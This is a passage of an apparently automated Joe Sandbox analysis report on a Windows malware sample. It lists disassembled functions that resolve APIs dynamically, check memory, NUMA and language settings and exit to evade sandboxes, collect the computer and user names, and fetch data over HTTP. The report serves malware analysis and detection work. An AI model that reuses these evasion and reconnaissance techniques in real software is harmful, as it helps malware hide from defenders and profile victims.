                                • GetProcAddress.KERNEL32(77190000,017915D0), ref: 00C96432
                                • GetProcAddress.KERNEL32(77190000,01798C48), ref: 00C9644B
                                • GetProcAddress.KERNEL32(77190000,017856E8), ref: 00C96463
                                • GetProcAddress.KERNEL32(77190000,01785528), ref: 00C9647B
                                • GetProcAddress.KERNEL32(77190000,01791618), ref: 00C96494
                                • GetProcAddress.KERNEL32(77190000,017917B0), ref: 00C964AC
                                • GetProcAddress.KERNEL32(77190000,01791510), ref: 00C964C4
                                • GetProcAddress.KERNEL32(77190000,01791528), ref: 00C964DD
                                • GetProcAddress.KERNEL32(77190000,017856C8), ref: 00C964F5
                                • GetProcAddress.KERNEL32(77190000,01791540), ref: 00C9650D
                                • GetProcAddress.KERNEL32(77190000,01791558), ref: 00C96526
                                • GetProcAddress.KERNEL32(77190000,017855E8), ref: 00C9653E
                                • GetProcAddress.KERNEL32(77190000,01791570), ref: 00C96556
                                • GetProcAddress.KERNEL32(77190000,017915E8), ref: 00C9656F
                                • GetProcAddress.KERNEL32(77190000,01785588), ref: 00C96587
                                • GetProcAddress.KERNEL32(77190000,01791888), ref: 00C9659F
                                • GetProcAddress.KERNEL32(77190000,01785488), ref: 00C965B8
                                • LoadLibraryA.KERNEL32(01791870,?,?,?,00C91C03), ref: 00C965C9
                                • LoadLibraryA.KERNEL32(017918A0,?,?,?,00C91C03), ref: 00C965DB
                                • LoadLibraryA.KERNEL32(017918B8,?,?,?,00C91C03), ref: 00C965ED
                                • LoadLibraryA.KERNEL32(017917F8,?,?,?,00C91C03), ref: 00C965FE
                                • LoadLibraryA.KERNEL32(01791828,?,?,?,00C91C03), ref: 00C96610
                                • GetProcAddress.KERNEL32(76850000,01791858), ref: 00C9662D
                                • GetProcAddress.KERNEL32(77040000,01791810), ref: 00C96649
                                • GetProcAddress.KERNEL32(77040000,01791840), ref: 00C96661
                                • GetProcAddress.KERNEL32(75A10000,01798F48), ref: 00C9667D
                                • GetProcAddress.KERNEL32(75690000,01785708), ref: 00C96699
                                • GetProcAddress.KERNEL32(776F0000,01798BA8), ref: 00C966B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00C966CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 00C966C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: aa8c4556724577458f0874c37989adf4fb51e3ef9de7a13e98ec884d79e5f5ea
                                • Instruction ID: 64c5a7fb06681f83e3f44e92bc18be2645cb8fc7727798379d44685c199511c5
                                • Opcode Fuzzy Hash: aa8c4556724577458f0874c37989adf4fb51e3ef9de7a13e98ec884d79e5f5ea
                                • Instruction Fuzzy Hash: BBA177B9A11200DFD754DF67EE88A2637B9F78E7807108519E916E3362DB34B808DF60
                                Function 00C91BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 c91bf0-c91c0b call c72a90 call c96390 2146 c91c1a-c91c27 call c72930 2141->2146 2147 c91c0d 2141->2147 2151 c91c29-c91c2f lstrcpy 2146->2151 2152 c91c35-c91c63 2146->2152 2148 c91c10-c91c18 2147->2148 2148->2146 2148->2148 2151->2152 2156 c91c6d-c91c7b GetSystemInfo 2152->2156 2157 c91c65-c91c67 ExitProcess 2152->2157 2158 c91c7d-c91c7f ExitProcess 2156->2158 2159 c91c85-c91ca0 call c71030 call c710c0 GetUserDefaultLangID 2156->2159 2164 c91cb8-c91cca call c92ad0 call c93e10 2159->2164 2165 c91ca2-c91ca9 2159->2165 2171 c91ccc-c91cde call c92a40 call c93e10 2164->2171 2172 c91ce7-c91d06 lstrlen call c72930 2164->2172 2165->2164 2166 c91cb0-c91cb2 ExitProcess 2165->2166 2171->2172 2185 c91ce0-c91ce1 ExitProcess 2171->2185 2177 c91d08-c91d0d 2172->2177 2178 c91d23-c91d40 lstrlen call c72930 2172->2178 2177->2178 2180 c91d0f-c91d11 2177->2180 2186 c91d5a-c91d7b call c92ad0 lstrlen call c72930 2178->2186 2187 c91d42-c91d44 2178->2187 2180->2178 2183 c91d13-c91d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 c91d9a-c91db4 lstrlen call c72930 2186->2193 2194 c91d7d-c91d7f 2186->2194 2187->2186 2188 c91d46-c91d54 lstrcpy lstrcat 2187->2188 2188->2186 2199 c91dce-c91deb call c92a40 lstrlen call c72930 2193->2199 2200 c91db6-c91db8 2193->2200 2194->2193 2196 c91d81-c91d85 2194->2196 2196->2193 2197 c91d87-c91d94 lstrcpy lstrcat 2196->2197 2197->2193 2206 c91e0a-c91e0f 2199->2206 2207 c91ded-c91def 2199->2207 2200->2199 2201 c91dba-c91dc8 lstrcpy lstrcat 2200->2201 2201->2199 2209 c91e11 call c72a20 2206->2209 2210 c91e16-c91e22 call c72930 2206->2210 2207->2206 2208 c91df1-c91df5 2207->2208 2208->2206 2213 c91df7-c91e04 lstrcpy lstrcat 2208->2213 2209->2210 2215 c91e30-c91e66 call c72a20 * 5 OpenEventA 2210->2215 2216 c91e24-c91e26 2210->2216 2213->2206 2228 c91e68-c91e8a CloseHandle Sleep OpenEventA 2215->2228 2229 c91e8c-c91ea0 CreateEventA call c91b20 call c8ffd0 2215->2229 2216->2215 2217 c91e28-c91e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 c91ea5-c91eae CloseHandle ExitProcess 2229->2233
                                APIs
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017915A0), ref: 00C963E9
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791588), ref: 00C96402
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791798), ref: 00C9641A
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017915D0), ref: 00C96432
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01798C48), ref: 00C9644B
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017856E8), ref: 00C96463
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01785528), ref: 00C9647B
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791618), ref: 00C96494
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017917B0), ref: 00C964AC
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791510), ref: 00C964C4
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791528), ref: 00C964DD
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,017856C8), ref: 00C964F5
                                  • Part of subcall function 00C96390: GetProcAddress.KERNEL32(77190000,01791540), ref: 00C9650D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C91C2F
                                • ExitProcess.KERNEL32 ref: 00C91C67
                                • GetSystemInfo.KERNEL32(?), ref: 00C91C71
                                • ExitProcess.KERNEL32 ref: 00C91C7F
                                  • Part of subcall function 00C71030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C71046
                                  • Part of subcall function 00C71030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C7104D
                                  • Part of subcall function 00C71030: ExitProcess.KERNEL32 ref: 00C71058
                                  • Part of subcall function 00C710C0: GlobalMemoryStatusEx.KERNEL32 ref: 00C710EA
                                  • Part of subcall function 00C710C0: ExitProcess.KERNEL32 ref: 00C71114
                                • GetUserDefaultLangID.KERNEL32 ref: 00C91C8F
                                • ExitProcess.KERNEL32 ref: 00C91CB2
                                • ExitProcess.KERNEL32 ref: 00C91CE1
                                • lstrlen.KERNEL32(01798BF8), ref: 00C91CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91D15
                                • lstrcat.KERNEL32(00000000,01798BF8), ref: 00C91D1D
                                • lstrlen.KERNEL32(00CA4B98), ref: 00C91D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91D48
                                • lstrcat.KERNEL32(00000000,00CA4B98), ref: 00C91D54
                                • lstrlen.KERNEL32(00000000), ref: 00C91D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91D94
                                • lstrlen.KERNEL32(00CA4B98), ref: 00C91D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91DBC
                                • lstrcat.KERNEL32(00000000,00CA4B98), ref: 00C91DC8
                                • lstrlen.KERNEL32(00000000), ref: 00C91DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91E04
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 8c7ee0c5b1697788abbff6ec8a6992366ddd79098237f89f30f99023ac27f139
                                • Instruction ID: 2c741889734defe8dc5f25bcc73c9729007637f2a4876339b029a33e4dbf4af5
                                • Opcode Fuzzy Hash: 8c7ee0c5b1697788abbff6ec8a6992366ddd79098237f89f30f99023ac27f139
                                • Instruction Fuzzy Hash: 1271D531601207AFDB21ABB1DD8EB6F36B9EF4A741F084024F916A6192DF30AD05DB60
                                Function 00C76C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 c76c40-c76c64 call c72930 2237 c76c66-c76c6b 2234->2237 2238 c76c75-c76c97 call c74bc0 2234->2238 2237->2238 2239 c76c6d-c76c6f lstrcpy 2237->2239 2242 c76caa-c76cba call c72930 2238->2242 2243 c76c99 2238->2243 2239->2238 2247 c76cbc-c76cc2 lstrcpy 2242->2247 2248 c76cc8-c76cf5 InternetOpenA StrCmpCA 2242->2248 2244 c76ca0-c76ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 c76cf7 2248->2249 2250 c76cfa-c76cfc 2248->2250 2249->2250 2251 c76d02-c76d22 InternetConnectA 2250->2251 2252 c76ea8-c76ebb call c72930 2250->2252 2254 c76ea1-c76ea2 InternetCloseHandle 2251->2254 2255 c76d28-c76d5d HttpOpenRequestA 2251->2255 2261 c76ebd-c76ebf 2252->2261 2262 c76ec9-c76ee0 call c72a20 * 2 2252->2262 2254->2252 2257 c76e94-c76e9e InternetCloseHandle 2255->2257 2258 c76d63-c76d65 2255->2258 2257->2254 2259 c76d67-c76d77 InternetSetOptionA 2258->2259 2260 c76d7d-c76dad HttpSendRequestA HttpQueryInfoA 2258->2260 2259->2260 2263 c76dd4-c76de4 call c93d90 2260->2263 2264 c76daf-c76dd3 call c971e0 call c72a20 * 2 2260->2264 2261->2262 2265 c76ec1-c76ec3 lstrcpy 2261->2265 2263->2264 2275 c76de6-c76de8 2263->2275 2265->2262 2277 c76dee-c76e07 InternetReadFile 2275->2277 2278 c76e8d-c76e8e InternetCloseHandle 2275->2278 2277->2278 2280 c76e0d 2277->2280 2278->2257 2282 c76e10-c76e15 2280->2282 2282->2278 2283 c76e17-c76e3d call c97310 2282->2283 2286 c76e44-c76e51 call c72930 2283->2286 2287 c76e3f call c72a20 2283->2287 2291 c76e53-c76e57 2286->2291 2292 c76e61-c76e8b call c72a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 c76e59-c76e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76C6F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76CC2
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C76CD5
                                • StrCmpCA.SHLWAPI(?,0179F498), ref: 00C76CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C76D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,-00400100,00000000), ref: 00C76D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00C76D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C76D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00C76DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C76DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00C76E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00C76E8E
                                • InternetCloseHandle.WININET(?), ref: 00C76E98
                                • InternetCloseHandle.WININET(00000000), ref: 00C76EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: df9eb207bd79831072cebdc23296a8ec070fa53b5093d28df9e4ba70281d15fd
                                • Instruction ID: b9888d7484da55944964d4129344a228b8628428a12a6bb3f505ab5ff524d1e5
                                • Opcode Fuzzy Hash: df9eb207bd79831072cebdc23296a8ec070fa53b5093d28df9e4ba70281d15fd
                                • Instruction Fuzzy Hash: 37819575A11615AFDB20DFA5DC49FAE77B8EF48700F148168F919F7281DB70AE048BA0
                                Function 00C74A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 c74a60-c74afc RtlAllocateHeap 2867 c74afe-c74b03 2850->2867 2868 c74b7a-c74bbe VirtualProtect 2850->2868 2869 c74b06-c74b78 2867->2869 2869->2868
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C74AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00C74BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 6d9100d7969bc6e191ce731a90aa5fdfbb42beabc0c4bc7d0cb3a23b07881c8a
                                • Instruction ID: ec7072ae81b41b61512924e5ce1784e931b44d6593bd028a8f2503b559bb9485
                                • Opcode Fuzzy Hash: 6d9100d7969bc6e191ce731a90aa5fdfbb42beabc0c4bc7d0cb3a23b07881c8a
                                • Instruction Fuzzy Hash: 1631C518B8032E768628EBFF4C4BF5F6E7DDFC6B68B024066F50857180C9E15520CAA3
                                Function 00C92AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2957 c92ad0-c92b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 c92b44-c92b59 2957->2958 2959 c92b24-c92b36 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00C92B1A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 7f87aa21996c00e842a6161adf4ae5bf1ee5f7359453d5720b72ab2d09e3e9e0
                                • Instruction ID: c90e2f21df03605708e337550a5807f58f3044c95f4484047d50819140a53ffa
                                • Opcode Fuzzy Hash: 7f87aa21996c00e842a6161adf4ae5bf1ee5f7359453d5720b72ab2d09e3e9e0
                                • Instruction Fuzzy Hash: CC01D672A44608AFCB10CF99EC85B9EF7B8F749B61F00026AF919E3780D774690487A1
                                Function 00C92A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00C92A8A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 9859cf9baab24253bace5d4c80733b6f1e53a78735394bb12e15bcbfbcb7c129
                                • Instruction ID: ff0e13d72695251e6a82a6bbf12f7eebc925a4ef2f3558347074c5282b104bfc
                                • Opcode Fuzzy Hash: 9859cf9baab24253bace5d4c80733b6f1e53a78735394bb12e15bcbfbcb7c129
                                • Instruction Fuzzy Hash: 98F0B4B1A40208AFD700DF89DD49B9EBBBCF709B61F000226F915E3380D7B4290486E1
                                Function 00C966E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
